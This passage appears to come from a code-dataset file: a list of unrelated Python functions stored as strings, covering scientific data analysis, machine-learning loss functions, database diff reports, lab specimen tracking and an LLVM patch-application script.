marked with '+-' in the s2\n if not(s2_split_list[1].__contains__('+-')):\n try: # integer and float to float\n s1_split_list_1=float(s1_split_list[1].strip())\n s2_split_list_1=float(s2_split_list[1].strip())\n # - comparison with global tolerance (if any) \n if(s1_split_list_1!=0.): \n if(not(s1_split_list[0]==s2_split_list[0]) or \n not((s1_split_list_1==s2_split_list_1) or \n ((s1_split_list_1<s2_split_list_1+\\\n s2_split_list_1*float(self.stdout_tol)/100) and \n (s1_split_list_1>s2_split_list_1-\n s2_split_list_1*float(self.stdout_tol)/100))) \n ): fail_cond=fail_cond and False \n else: # case = 0 \n if(not(s1_split_list[0]==s2_split_list[0]) or \n not((s1_split_list_1==s2_split_list_1) or \n ((s1_split_list_1<s2_split_list_1+\\\n float(self.stdout_tol)/100) and \n (s1_split_list_1>s2_split_list_1-\n float(self.stdout_tol)/100))) \n ): fail_cond=fail_cond and False \n logger.debug('ExecTestBase2:__CompareTest1: right side of = for '+\\\n repr(i)+' are '+repr(s1_split_list_1)+' '+\\\n repr(s2_split_list_1)+' with global tol (%) '+\\\n repr(self.stdout_tol)+' '+repr(fail_cond) )\n except: # strings\n s1_split_list[1]=s1_split_list[1].strip() \n s2_split_list[1]=s2_split_list[1].strip() \n logger.debug('ExecTestBase2:__CompareTest1: right side of = for '+\\\n repr(i)+' are '+s1_split_list[1]+' '+\\\n s2_split_list[1])\n if(not(s1_split_list[0]==s2_split_list[0]) or \n not(s1_split_list[1]==s2_split_list[1]) ): fail_cond=fail_cond and False \n else: \n # - comparison with local tolerance \n print 'mgallas, to be done local tolerance'\n return fail_cond\n\n for j in range(len(self.causes)):\n print 'mgallas causes '+causes[j]\n \n return True", "def do_comparison(found_file, created_file):\n\n fh_f, fh_c, data_f, data_c = get_data(found_file, created_file)\n\n print('Initial found data shape ', data_f.shape)\n print(' and created data shape= ', data_c.shape)\n\n # Compare slice i of created to slice i+1 in found\n if (data_f.shape[0] == 1): # NIRCAM\n data_f = data_f[0, :, :, :]\n if (data_c.shape[0] == 1): # to accept output of mc_4d\n data_c = data_c[0, :, :, :]\n data_c_start = data_c[:-1, :, :]\n data_f_end = data_f[1:, :, :]\n elif (fh_f['SCI'].header['NAXIS'] == 3): # NIRSPEC\n data_c_start = data_c[:-1, :, :]\n data_f_end = data_f[1:, :, :]\n elif (data_f.shape[0] > 1 and fh_f['SCI'].header['NAXIS'] == 4): # MIRI\n # concatenate copies of created data (except for the last frame)\n num_ints = int(fh_f[1].data.shape[0]) # number of integrations\n data_c_start = (np.repeat(data_c[:-1, :, :], num_ints, axis=0))\n data_f_end = data_f[:, 1:, :, :]\n data_c_start = data_c_start.reshape(data_f_end.shape)\n else:\n print(' FATAL ERROR - unsupported instrument')\n\n print('Truncated found data shape ', data_f_end.shape)\n print(' and truncated created data shape= ', data_c_start.shape)\n try:\n assert(data_f_end.shape == data_c_start.shape)\n except AssertionError:\n print(' FATAL ERROR: adjusted found data shape ', data_f.shape, \\\n ' is not the same as adjusted created data shape= ', data_c.shape)\n\n neither = (data_c_start == 0.) & (data_f_end == 0.)\n both = (data_c_start != 0.) & (data_f_end != 0.) # created CR was found\n c_only = (data_c_start != 0.) & (data_f_end == 0.) # created CR not found\n f_only = (data_c_start == 0.) & (data_f_end != 0.) 
# found CR was not created\n\n try:\n assert(neither.sum() + both.sum() + c_only.sum() + f_only.sum() \\\n == data_c_start.size)\n except AssertionError:\n print('FATAL ERROR: sum of components must equal total number of pixels ')\n\n print(' Within the input dataset cubes:')\n print(' Number of created but not found pixels: ', c_only.sum())\n print(' Number of found but not created pixels: ', f_only.sum())\n print(' Number of pixels that are both found and created: ', both.sum())\n print(' Number of pixels that are neither found nor created: ', neither.sum())\n print(' ')\n print(' The fraction of all pixels that were found only: ', \\\n float(f_only.sum()) / float(data_c_start.size))\n print(' The fraction of all pixels that were created only: ', \\\n float(c_only.sum()) / float(data_c_start.size))\n print(' The fraction of pixels in the created file having cosmic rays:', \\\n float(c_only.sum()) / (data_c_start.shape[-2] * data_c_start.shape[-1]))\n print(' ')\n\n write_files(neither, both, c_only, f_only, fh_c, data_c_start)", "def compute_diagnostics(self) -> Dict[str, Any]:\n return {}", "def verbose_loss(self, feedback: _Feedback, extra_info) -> Dict[str, _Array]:\n hint_preds, diff_logits, gt_diffs = extra_info\n\n for inp in feedback.features.inputs:\n if inp.location in [_Location.NODE, _Location.EDGE]:\n nb_nodes = inp.data.shape[1]\n break\n\n total_loss = 0.0\n lengths = feedback.features.lengths\n\n losses = {}\n if self.decode_diffs:\n for loc in _Location:\n for i in range(len(gt_diffs)):\n is_not_done = _is_not_done_broadcast(lengths, i, gt_diffs[i][loc])\n diff_loss = (\n jnp.maximum(diff_logits[i][loc], 0) -\n diff_logits[i][loc] * gt_diffs[i][loc] +\n jnp.log1p(jnp.exp(-jnp.abs(diff_logits[i][loc]))) * is_not_done)\n losses[loc.name + '_diff_%d' % i] = jnp.mean(diff_loss)\n\n if self.decode_hints:\n for truth in feedback.features.hints:\n for i in range(truth.data.shape[0] - 1):\n assert truth.name in hint_preds[i]\n pred = hint_preds[i][truth.name]\n is_not_done = _is_not_done_broadcast(lengths, i, truth.data[i + 1])\n if truth.type_ == _Type.SCALAR:\n if self.decode_diffs:\n total_loss = jnp.mean((pred - truth.data[i + 1])**2 *\n gt_diffs[i][truth.location] * is_not_done)\n else:\n total_loss = jnp.mean((pred - truth.data[i + 1])**2 * is_not_done)\n elif truth.type_ == _Type.MASK:\n if self.decode_diffs:\n total_loss = jnp.mean(\n jnp.maximum(pred, 0) - pred * truth.data[i + 1] +\n jnp.log1p(jnp.exp(-jnp.abs(pred))) *\n gt_diffs[i][truth.location] * is_not_done)\n else:\n total_loss = jnp.mean(\n jnp.maximum(pred, 0) - pred * truth.data[i + 1] +\n jnp.log1p(jnp.exp(-jnp.abs(pred))) * is_not_done)\n elif truth.type_ == _Type.MASK_ONE:\n if self.decode_diffs:\n total_loss = jnp.mean(\n -jnp.sum(\n truth.data[i + 1] * jax.nn.log_softmax(\n pred) * is_not_done, axis=-1, keepdims=True) *\n gt_diffs[i][truth.location])\n else:\n total_loss = jnp.mean(-jnp.sum(\n truth.data[i + 1] * jax.nn.log_softmax(\n pred) * is_not_done, axis=-1))\n elif truth.type_ == _Type.CATEGORICAL:\n if self.decode_diffs:\n total_loss = jnp.mean(\n -jnp.sum(\n truth.data[i + 1] * jax.nn.log_softmax(\n pred), axis=-1, keepdims=True) *\n jnp.expand_dims(gt_diffs[i][truth.location], -1) *\n is_not_done)\n else:\n total_loss = jnp.mean(-jnp.sum(\n truth.data[i + 1] * jax.nn.log_softmax(pred), axis=-1) *\n is_not_done)\n elif truth.type_ == _Type.POINTER:\n if self.decode_diffs:\n total_loss = jnp.mean(-jnp.sum(\n hk.one_hot(truth.data[i + 1], nb_nodes) *\n jax.nn.log_softmax(pred),\n axis=-1) * 
gt_diffs[i][truth.location] * is_not_done)\n else:\n total_loss = jnp.mean(-jnp.sum(\n hk.one_hot(truth.data[i + 1], nb_nodes) *\n jax.nn.log_softmax(pred),\n axis=-1) * is_not_done)\n else:\n raise ValueError('Incorrect type')\n losses[truth.name + '_%d' % i] = total_loss\n return losses", "def reconcile_with_destination(self, exception_cls=None, print_messages=None):\n def print(*args, **kwargs):\n if print_messages:\n return __builtins__.print(*args, **kwargs)\n try:\n with pyodbc.connect(settings.LAB_IMPORT_DMIS_DATA_SOURCE) as cnxn:\n with cnxn.cursor() as self.cursor:\n for received_datetime, edc_specimen_identifier in self.received_items:\n try:\n packing_list_item = PackingListItem.objects.get(\n item_reference=edc_specimen_identifier, received=False)\n self.update_packing_list_item(packing_list_item, received_datetime)\n print(edc_specimen_identifier + ' (received)')\n except MultipleObjectsReturned:\n for packing_list_item in PackingListItem.objects.filter(\n item_reference=edc_specimen_identifier, received=False):\n self.update_packing_list_item(packing_list_item, received_datetime)\n print(edc_specimen_identifier + ' (received - dup)')\n except PackingListItem.DoesNotExist:\n pass\n for received_datetime, edc_specimen_identifier, alpha_code in self.stored_items:\n try:\n packing_list_item = PackingListItem.objects.get(\n item_reference=edc_specimen_identifier, received=False)\n Aliquot.objects.get(\n aliquot_identifier=edc_specimen_identifier, aliquot_type__alpha_code=alpha_code)\n self.update_packing_list_item(packing_list_item, received_datetime)\n print(edc_specimen_identifier + ' (received in storage)')\n except MultipleObjectsReturned:\n for packing_list_item in PackingListItem.objects.filter(\n item_reference=edc_specimen_identifier, received=False):\n self.update_packing_list_item(packing_list_item, received_datetime)\n print(edc_specimen_identifier + ' (received in storage - dup)')\n except PackingListItem.DoesNotExist:\n pass\n except Aliquot.DoesNotExist:\n print(edc_specimen_identifier + ' Wrong specimen type. 
Got {}.'.format(alpha_code))\n except pyodbc.Error as error:\n if exception_cls:\n raise exception_cls(str(error))\n else:\n raise\n print('Received packing list items for {}:'.format(\n site_mappers.get_current_mapper().map_area, PackingListItem.objects.filter(received=True).count()))\n for panel in PackingListItem.objects.values('panel__name').filter(received=True).annotate(Count('panel')):\n print('{}: {}'.format(panel.get('panel__name'), panel.get('panel__count')))\n print('List of pending packing list items for {}:'.format(site_mappers.get_current_mapper().map_area))\n for packing_list_item in PackingListItem.objects.filter(received=False).order_by('created'):\n try:\n item_datetime = packing_list_item.item_datetime.strftime('%Y-%m-%d')\n except AttributeError:\n item_datetime = None\n try:\n panel_name = packing_list_item.panel.name.replace(' ', '_')\n except AttributeError:\n panel_name = None\n print('{} {} pending {} {}'.format(\n packing_list_item.item_reference,\n packing_list_item.packing_list.timestamp,\n item_datetime,\n panel_name,\n ))", "def test_with_known_snapping_error_data():\n linestrings_loaded = (\n samples.results_in_non_simple_from_branches_and_nodes_linestring_list\n )\n linestrings = [ls for ls in linestrings_loaded if isinstance(ls, LineString)]\n assert len(linestrings_loaded) == len(linestrings)\n result, any_changed_applied = branches_and_nodes.snap_traces(\n linestrings, tests.snap_threshold\n )\n count = 0\n while any_changed_applied:\n result, any_changed_applied = branches_and_nodes.snap_traces(\n result, tests.snap_threshold\n )\n count += 1\n if count > 10:\n raise RecursionError(\"Expected count to stay under 11.\")\n\n for ls in result:\n assert ls.is_simple\n assert isinstance(ls, LineString)", "def render_diff_report():\n if nori.core.cfg['action'] == 'diff':\n diff_report = ' Diff Report '\n elif nori.core.cfg['action'] == 'sync':\n diff_report = ' Diff / Sync Report '\n diff_report = ('#' * len(diff_report) + '\\n' +\n diff_report + '\\n' +\n '#' * len(diff_report) + '\\n\\n')\n if nori.core.cfg['report_order'] == 'template':\n for template_index in diff_dict:\n template = nori.core.cfg['templates'][template_index]\n section_header = ('Template {0} ({1}):' .\n format(template_index,\n nori.pps(template[T_NAME_KEY])))\n section_header += '\\n' + ('-' * len(section_header)) + '\\n\\n'\n diff_report += section_header\n for diff_t in diff_dict[template_index]:\n exists_in_source = diff_t[0]\n source_row = diff_t[1]\n exists_in_dest = diff_t[2]\n dest_row = diff_t[3]\n has_been_changed = diff_t[4]\n if exists_in_source:\n source_str = nori.pps(source_row[1])\n elif exists_in_source is None:\n source_str = '[no value match in source database]'\n else:\n source_str = '[no key match in source database]'\n if exists_in_dest:\n dest_str = nori.pps(dest_row[1])\n elif exists_in_dest is None:\n dest_str = '[no value match in destination database]'\n else:\n dest_str = '[no key match in destination database]'\n if has_been_changed is None:\n changed_str = 'unchanged'\n elif not has_been_changed:\n changed_str = (\n 'partially changed - action may be needed!'\n )\n else:\n changed_str = 'changed'\n diff_report += (\n 'Source: {0}\\nDest: {1}\\nStatus: {2}\\n\\n' .\n format(source_str, dest_str, changed_str)\n )\n diff_report += '\\n'\n elif nori.core.cfg['report_order'] == 'keys':\n for key_str in diff_dict:\n section_header = ('Key tuple {0}:' .\n format(nori.pps(key_str)))\n section_header += '\\n' + ('-' * len(section_header)) + '\\n\\n'\n diff_report += 
section_header\n for diff_t in diff_dict[key_str]:\n template_index = diff_t[0]\n exists_in_source = diff_t[1]\n source_row = diff_t[2]\n exists_in_dest = diff_t[3]\n dest_row = diff_t[4]\n has_been_changed = diff_t[5]\n template = nori.core.cfg['templates'][template_index]\n if exists_in_source:\n num_keys = source_row[0]\n source_data = source_row[1]\n source_str = nori.pps(source_data[num_keys:])\n elif exists_in_source is None:\n source_str = '[no value match in source database]'\n else:\n source_str = '[no key match in source database]'\n if exists_in_dest:\n num_keys = dest_row[0]\n dest_data = dest_row[1]\n dest_str = nori.pps(dest_data[num_keys:])\n elif exists_in_dest is None:\n dest_str = '[no value match in destination database]'\n else:\n dest_str = '[no key match in destination database]'\n if has_been_changed is None:\n changed_str = 'unchanged'\n elif not has_been_changed:\n changed_str = (\n 'partially changed - action may be needed!'\n )\n else:\n changed_str = 'changed'\n diff_report += (\n 'Template: {0}\\nSource: {1}\\nDest: {2}\\n'\n 'Status: {3}\\n\\n' .\n format(template[T_NAME_KEY], source_str, dest_str,\n changed_str)\n )\n diff_report += '\\n'\n return diff_report.strip()", "def analyze_thresholds(datapath, threshold_lt1, threshold_lt2, normalize = True, save = 1):\n print 'analyzing thresholds...' \n current_dir = os.getcwd()\n os.chdir(datapath)\n files = os.listdir(datapath)\n\n for k in arange(len(files)):\n right_file = '.npz' in files[k]\n \n if right_file:\n data = numpy.load(datapath+'\\\\'+files[k])\n \n CR_cts_after_seq_lt1 = data['cr_hist_LT1_first']\n CR_cts_after_seq_lt2 = data['cr_hist_LT2_first']\n\n nr_of_counts = arange(len(CR_cts_after_seq_lt1))\n\n CR_cts_total_lt1 = data['cr_hist_LT1_total']\n CR_cts_total_lt2 = data['cr_hist_LT2_total']\n \n if normalize:\n CR_cts_after_seq_lt2 = CR_cts_after_seq_lt2/float(sum(CR_cts_after_seq_lt2))\n CR_cts_total_lt2 = CR_cts_total_lt2/float(sum(CR_cts_total_lt2))\n times_passed_after_seq_lt2 = CR_cts_after_seq_lt2[nr_of_counts>=threshold_lt2].sum()*100\n times_passed_overall_lt2 = CR_cts_total_lt2[nr_of_counts>=threshold_lt2].sum()*100\n \n CR_cts_after_seq_lt1 = CR_cts_after_seq_lt1/float(sum(CR_cts_after_seq_lt1))\n CR_cts_total_lt1 = CR_cts_total_lt1/float(sum(CR_cts_total_lt1))\n times_passed_after_seq_lt1 = CR_cts_after_seq_lt1[nr_of_counts>=threshold_lt1].sum()*100\n times_passed_overall_lt1 = CR_cts_total_lt1[nr_of_counts>=threshold_lt1].sum()*100\n else:\n times_passed_after_seq_lt2 = CR_cts_after_seq_lt2[nr_of_counts>=threshold_lt2].sum()/float(CR_cts_after_seq_lt2.sum())*100\n times_passed_overall_lt2 = CR_cts_total_lt2[nr_of_counts>=threshold_lt2].sum()/float(CR_cts_total_lt2.sum())*100\n times_passed_after_seq_lt1 = CR_cts_after_seq_lt1[nr_of_counts>=threshold_lt1].sum()*100/float(CR_cts_after_seq_lt1.sum())\n times_passed_overall_lt1 = CR_cts_total_lt1[nr_of_counts>=threshold_lt1].sum()*100/float(CR_cts_total_lt1.sum())\n\n\n #print 'After sequence: LT2 percentage passed = ',num2str(sum(times_passed_after_seq_lt2),1),'%'\n #print 'and LT1 percentage passed = ',num2str(sum(times_passed_after_seq_lt1),1),'%'\n\n Log = False\n\n figure6 = plt.figure(figsize=(16.0, 12.0))\n plt.subplot(223)\n plt.bar(nr_of_counts,CR_cts_after_seq_lt2,log=Log, color = 'm')\n plt.xlabel('Number of counts')\n plt.ylabel('Fraction of occurrences')\n if normalize:\n plt.title('LT2: CR counts after sequence, passed threshold: '+num2str(times_passed_after_seq_lt2,1)+'%')\n else:\n plt.title('CR counts after sequence')\n 
plt.xlim(0,25)\n \n plt.subplot(224)\n plt.bar(nr_of_counts,CR_cts_total_lt2,log=Log, color = 'm')\n plt.xlabel('Number of counts')\n plt.ylabel('Fraction of occurrences')\n if normalize:\n plt.title('LT2: all CR checks, passed threshold: '+num2str(times_passed_overall_lt2,1)+'%')\n else:\n plt.title('CR counts for all CR checks')\n plt.xlim(0,25)\n\n plt.subplot(221)\n plt.bar(nr_of_counts,CR_cts_after_seq_lt1,log=Log, color = 'b')\n plt.xlabel('Number of counts')\n plt.ylabel('Fraction of occurrences')\n if normalize:\n plt.title('LT1: CR counts after sequence, passed threshold: '+num2str(times_passed_after_seq_lt1,1)+'%')\n else:\n plt.title('CR counts after sequence')\n plt.xlim(0,50)\n \n plt.subplot(222)\n plt.bar(nr_of_counts,CR_cts_total_lt1,log=Log, color = 'b')\n plt.xlabel('Number of counts')\n plt.ylabel('Fraction of occurrences')\n if normalize:\n plt.title('LT1: all CR checks, passed threshold: '+num2str(times_passed_overall_lt1,1)+'%')\n else:\n plt.title('CR counts for all CR checks')\n plt.xlim(0,50)\n \n if save:\n if normalize:\n figure6.savefig('CR_information_LT1_and_LT2_normalized.pdf')\n else:\n figure6.savefig('CR_information_LT1_and_LT2.pdf')\n\n\n return times_passed_overall_lt1, times_passed_after_seq_lt1, times_passed_overall_lt2, times_passed_after_seq_lt2", "def dataframe_difference(df_from_nerc,df_from_pangea):\n if len(df_from_nerc)!=0: # nothing to insert or update if df_from_nerc is empty\n not_in_database=[\n df_from_nerc.iloc[i]['semantic_uri'] \n not in df_from_pangea['semantic_uri'].values \n for i in range(len(df_from_nerc))\n ] \n df_from_nerc['action']= np.where(not_in_database ,'insert', '') # if there are different elements we always have to insert them\n df_insert=df_from_nerc[df_from_nerc['action']=='insert']\n if len(df_insert)==0:\n df_insert=None\n ## update cond\n if len(df_from_pangea)!=0: # nothing to update if df_from_pangea(pangaea db) is empty\n in_database=np.invert(not_in_database)\n df_from_nerc_in_database=df_from_nerc[in_database] \n # create Timestamp lists with times of corresponding elements in df_from_nerc and df_from_pangea //corresponding elements chosen by semanntic_uri\n df_from_nerc_in_database_T=[\n df_from_nerc_in_database[df_from_nerc_in_database['semantic_uri']==s_uri]['datetime_last_harvest'].iloc[0] \n for s_uri in df_from_nerc_in_database['semantic_uri']\n ]\n df_from_pangea_T=[\n df_from_pangea[df_from_pangea['semantic_uri']==s_uri]['datetime_last_harvest'].iloc[0] \n for s_uri in df_from_nerc_in_database['semantic_uri']\n ]\n # create list of booleans (condition for outdated elements)\n df_from_nerc_in_database_outdated=[df_from_nerc_in_database_T[i]>df_from_pangea_T[i] for i in range(len(df_from_nerc_in_database_T))]\n df_from_nerc_in_database=df_from_nerc_in_database.assign(action= np.where(df_from_nerc_in_database_outdated ,'update', ''))\n df_update=df_from_nerc_in_database[df_from_nerc_in_database['action']=='update']\n if len(df_update)==0: # make sure not to return empty dataframes! 
\n df_update=None\n else:\n df_update=None\n \n return df_insert,df_update\n \n else:\n df_insert,df_update=None,None\n \n return df_insert,df_update #df_insert/df_update.shape=(n,7) only 7 initial columns!", "def _state_diff(\n old_state: State, new_state: State\n) -> dict[str, dict[str, dict[str, dict[str, str | list[str]]]]]:\n additions: dict[str, Any] = {}\n diff: dict[str, dict[str, Any]] = {STATE_DIFF_ADDITIONS: additions}\n new_state_context = new_state.context\n old_state_context = old_state.context\n if old_state.state != new_state.state:\n additions[COMPRESSED_STATE_STATE] = new_state.state\n if old_state.last_changed != new_state.last_changed:\n additions[COMPRESSED_STATE_LAST_CHANGED] = new_state.last_changed.timestamp()\n elif old_state.last_updated != new_state.last_updated:\n additions[COMPRESSED_STATE_LAST_UPDATED] = new_state.last_updated.timestamp()\n if old_state_context.parent_id != new_state_context.parent_id:\n additions[COMPRESSED_STATE_CONTEXT] = {\"parent_id\": new_state_context.parent_id}\n if old_state_context.user_id != new_state_context.user_id:\n if COMPRESSED_STATE_CONTEXT in additions:\n additions[COMPRESSED_STATE_CONTEXT][\"user_id\"] = new_state_context.user_id\n else:\n additions[COMPRESSED_STATE_CONTEXT] = {\"user_id\": new_state_context.user_id}\n if old_state_context.id != new_state_context.id:\n if COMPRESSED_STATE_CONTEXT in additions:\n additions[COMPRESSED_STATE_CONTEXT][\"id\"] = new_state_context.id\n else:\n additions[COMPRESSED_STATE_CONTEXT] = new_state_context.id\n if (old_attributes := old_state.attributes) != (\n new_attributes := new_state.attributes\n ):\n for key, value in new_attributes.items():\n if old_attributes.get(key) != value:\n additions.setdefault(COMPRESSED_STATE_ATTRIBUTES, {})[key] = value\n if removed := set(old_attributes).difference(new_attributes):\n # sets are not JSON serializable by default so we convert to list\n # here if there are any values to avoid jumping into the json_encoder_default\n # for every state diff with a removed attribute\n diff[STATE_DIFF_REMOVALS] = {COMPRESSED_STATE_ATTRIBUTES: list(removed)}\n return {ENTITY_EVENT_CHANGE: {new_state.entity_id: diff}}", "def _consolidate_spont_results(self):\n\n # SPONT vs. 
SPONT\n\n # 1) deal with numeric results for spont spont\n df = self.numeric_results.copy()\n mean_cols = [c for c in df.columns if '_sem' not in c]\n err_cols = [c for c in df.columns if '_sem' in c]\n\n spont_spont_mean = df.loc[pd.IndexSlice[self.spont_stimulus_pairs, :], :][mean_cols].groupby(by='n_components').mean()\n spont_spont_sem = df.loc[pd.IndexSlice[self.spont_stimulus_pairs, :], :][err_cols].groupby(by='n_components').apply(error_prop)\n spont_spont = pd.concat([spont_spont_mean, spont_spont_sem], axis=1)\n new_idx = pd.MultiIndex.from_tuples([pd.Categorical(('spont_spont', n_components)) \n for n_components in spont_spont.index], names=['combo', 'n_components'])\n spont_spont.set_index(new_idx, inplace=True)\n\n # drop individual spont_spont pairs from master df\n df = df[~df.index.get_level_values('combo').isin(self.spont_stimulus_pairs)]\n\n # add new spont results to df\n df = spont_spont.append(df)\n self.numeric_results = df.copy()\n\n\n # 2) deal with array results for spont_spont\n for obj in self.object_keys:\n df = self.array_results[obj].copy()\n sp_df = df.loc[pd.IndexSlice[self.spont_stimulus_pairs, :], :]\n\n if 'evecs' in obj:\n m = [np.nanmean(reflect_eigenvectors(x), axis=0) for x in [np.stack([a for a in arr[1]['mean'].values]) for arr in sp_df.groupby('n_components')]]\n sem = [error_prop(x, axis=0) for x in [np.stack([a for a in arr[1]['sem'].values]) for arr in sp_df.groupby('n_components')]]\n else:\n m = [np.nanmean(x, axis=0) for x in [np.stack([a for a in arr[1]['mean'].values]) for arr in sp_df.groupby('n_components')]]\n sem = [error_prop(x, axis=0) for x in [np.stack([a for a in arr[1]['sem'].values]) for arr in sp_df.groupby('n_components')]]\n \n components = [arr[0] for arr in sp_df.groupby('n_components')]\n new_idx = pd.MultiIndex.from_tuples([pd.Categorical(('spont_spont', n_components)) \n for n_components in components], names=['combo', 'n_components'])\n new_df = pd.DataFrame(index=new_idx, columns=['mean', 'sem'])\n new_df['mean'] = m\n new_df['sem'] = sem\n\n df = df[~df.index.get_level_values('combo').isin(self.spont_stimulus_pairs)]\n df = new_df.append(df)\n \n self.array_results[obj] = df.copy()\n\n self.spont_stimulus_pairs = ['spont_spont']\n\n\n # SPONT vs. 
EVOKED\n df = self.numeric_results.copy()\n unique_evoked_bins = np.unique([[c.split('_')[0], c.split('_')[1]] for c in self.evoked_stimulus_pairs])\n\n # 1) deal with numeric results\n new_sp_ev_pairs = []\n for stim in unique_evoked_bins:\n # get all spont / evoked combos\n sp_ev = np.unique([c for c in self.spont_evoked_stimulus_pairs if stim in c])\n m = df.loc[pd.IndexSlice[sp_ev, :], :][mean_cols].groupby(by='n_components').mean()\n sem = df.loc[pd.IndexSlice[sp_ev, :], :][err_cols].groupby(by='n_components').apply(error_prop)\n sp_ev_df = pd.concat([m, sem], axis=1)\n new_idx = pd.MultiIndex.from_tuples([pd.Categorical(('spont_{}'.format(stim), n_components)) \n for n_components in sp_ev_df.index], names=['combo', 'n_components']) \n sp_ev_df.set_index(new_idx, inplace=True)\n df = sp_ev_df.append(df)\n new_sp_ev_pairs.append('spont_{}'.format(stim))\n\n # remove inividual spont_evoked pairs \n df = df[~df.index.get_level_values('combo').isin(self.spont_evoked_stimulus_pairs)] \n\n # save updated dataframe for numeric results\n self.numeric_results = df.copy()\n\n # 2) deal with object results\n for obj in self.object_keys:\n df = self.array_results[obj].copy()\n for stim in unique_evoked_bins:\n sp_ev = np.unique([c for c in self.spont_evoked_stimulus_pairs if stim in c])\n sp_df = df.loc[pd.IndexSlice[sp_ev, :], :]\n\n if 'evecs' in obj:\n m = [np.nanmean(reflect_eigenvectors(x), axis=0) for x in [np.stack([a for a in arr[1]['mean'].values]) for arr in sp_df.groupby('n_components')]]\n sem = [error_prop(x, axis=0) for x in [np.stack([a for a in arr[1]['sem'].values]) for arr in sp_df.groupby('n_components')]]\n else:\n m = [np.nanmean(x, axis=0) for x in [np.stack([a for a in arr[1]['mean'].values]) for arr in sp_df.groupby('n_components')]]\n sem = [error_prop(x, axis=0) for x in [np.stack([a for a in arr[1]['sem'].values]) for arr in sp_df.groupby('n_components')]]\n components = [arr[0] for arr in sp_df.groupby('n_components')]\n new_idx = pd.MultiIndex.from_tuples([pd.Categorical(('spont_{}'.format(stim), n_components)) \n for n_components in components], names=['combo', 'n_components'])\n new_df = pd.DataFrame(index=new_idx, columns=['mean', 'sem'])\n new_df['mean'] = m\n new_df['sem'] = sem\n\n df = df[~df.index.get_level_values('combo').isin(self.spont_evoked_stimulus_pairs)]\n df = new_df.append(df)\n self.array_results[obj] = df\n\n # update self.spont_evoked_stimulus_pairs\n self.spont_evoked_stimulus_pairs = new_sp_ev_pairs \n\n # no need to return anything... 
just update object attributes", "def run(self):\n try:\n diff = self.get_diff(self.diff_id)\n revision = self.get_revision(diff.revisionID)\n url = f\"https://reviews.llvm.org/D{revision['id']}?id={diff['id']}\"\n annotate(f\"Patching changes [{url}]({url})\", style='info', context='patch_diff')\n self.reset_repository()\n self.revision_id = revision['id']\n dependencies = self.get_dependencies(revision)\n dependencies.reverse() # Now revisions will be from oldest to newest.\n if len(dependencies) > 0:\n logging.info('This diff depends on: {}'.format(revision_list_to_str(dependencies)))\n plan = []\n for r in dependencies:\n if r['statusName'] == 'Closed':\n logging.info(f'skipping revision {r[\"id\"]} - it is closed, assuming it has landed')\n continue\n d = self.get_diff(r['diffs'][0])\n plan.append((r, d))\n plan.append((revision, diff))\n logging.info('Planning to apply in order:')\n for (r, d) in plan:\n logging.info(f\"https://reviews.llvm.org/D{r['id']}?id={d['id']}\")\n # Pick the newest known commit as a base for patches.\n base_commit = None\n for (r, d) in plan:\n c = self.find_commit(d['sourceControlBaseRevision'])\n if c is None:\n logging.warning(f\"D{r['id']}#{d['id']} commit {d['sourceControlBaseRevision']} does not exist\")\n continue\n if base_commit is None:\n logging.info(f\"D{r['id']}#{d['id']} commit {c.hexsha} exists\")\n base_commit = c\n elif c.committed_datetime > base_commit.committed_datetime:\n logging.info(f\"D{r['id']}#{d['id']} commit {c.hexsha} has a later commit date then\"\n f\"{base_commit.hexsha}\")\n base_commit = c\n if self.base_revision != 'auto':\n logging.info(f'Base revision \"{self.base_revision}\" is set by command argument. Will use '\n f'instead of resolved \"{base_commit}\"')\n base_commit = self.find_commit(self.base_revision)\n if base_commit is None:\n base_commit = self.repo.heads['main'].commit\n annotate(f\"Cannot find a base git revision. Will use current HEAD.\",\n style='warning', context='patch_diff')\n self.create_branch(base_commit)\n for (r, d) in plan:\n if not self.apply_diff(d, r):\n return 1\n if self.push_branch:\n self.repo.git.push('--force', 'origin', self.branch_name)\n annotate(f\"Created branch [{self.branch_name}]\"\n f\"(https://github.com/llvm-premerge-tests/llvm-project/tree/{self.branch_name}).\\n\\n\"\n f\"To checkout locally, run in your copy of llvm-project directory:\\n\\n\"\n \"```shell\\n\"\n \"git remote add premerge git@github.com:llvm-premerge-tests/llvm-project.git #first time\\n\"\n f\"git fetch premerge {self.branch_name}\\n\"\n f\"git checkout -b {self.branch_name} --track premerge/{self.branch_name}\\n\"\n \"```\",\n style='success',\n context='patch_diff')\n logging.info('Branch {} has been pushed'.format(self.branch_name))\n return 0\n except Exception as e:\n annotate(f\":bk-status-failed: Unexpected error. 
Consider [creating a bug]({feedback_url()}).\",\n style='error', context='patch_diff')\n logging.error(f'exception: {e}')\n return 1", "def svn_client_diff_summarize2(char_path1, svn_opt_revision_t_revision1, char_path2, svn_opt_revision_t_revision2, svn_depth_t_depth, svn_boolean_t_ignore_ancestry, apr_array_header_t_changelists, svn_client_diff_summarize_func_t_summarize_func, void_summarize_baton, svn_client_ctx_t_ctx, apr_pool_t_pool): # real signature unknown; restored from __doc__\n pass", "def compute_feedback_gradients(self, h_previous_corrupted, sigma):\n\n self.set_feedback_requires_grad(True)\n\n h_current = self.dummy_forward(h_previous_corrupted)\n h = self.propagate_backward(h_current)\n\n if sigma < 0.02:\n scale = 1/0.02**2\n else:\n scale = 1/sigma**2\n reconstruction_loss = scale * F.mse_loss(h, h_previous_corrupted)\n\n self.save_feedback_gradients(reconstruction_loss)\n\n self.set_feedback_requires_grad(False)", "def calculate_loss(estimated_separation, true_separation, mask, true_latents, estimated_mix, true_mix, args):\n stats = torch.zeros(7).to(mask.device)\n\n sdr = sdr_objective(estimated_separation, true_separation, mask)\n stats[:4] = sdr\n total_loss = -sdr.sum()\n\n reconstruction_sdr = sdr_objective(estimated_mix, true_mix).mean() if args.reconstruction_loss_weight > 0 else 0.0\n stats[4] = reconstruction_sdr\n total_loss += -args.reconstruction_loss_weight * reconstruction_sdr\n\n if args.similarity_loss_weight > 0.0 or args.dissimilarity_loss_weight > 0.0:\n mask = mask.squeeze(-1)\n true_latents = true_latents * mask.unsqueeze(-1).unsqueeze(-1)\n true_latents = true_latents.transpose(0, 1)\n\n dissimilarity = dissimilarity_loss(true_latents, mask) if args.dissimilarity_loss_weight > 0.0 else 0.0\n stats[5] = dissimilarity\n total_loss += args.dissimilarity_loss_weight * dissimilarity\n\n similarity = similarity_loss(true_latents, mask) if args.similarity_loss_weight > 0.0 else 0.0\n stats[6] = similarity\n total_loss += -args.similarity_loss_weight * similarity\n\n return total_loss, stats", "def print_diff_summary(self, other, **kwargs):\r\n\r\n def diff_dict(a_time, b_time_):\r\n r = 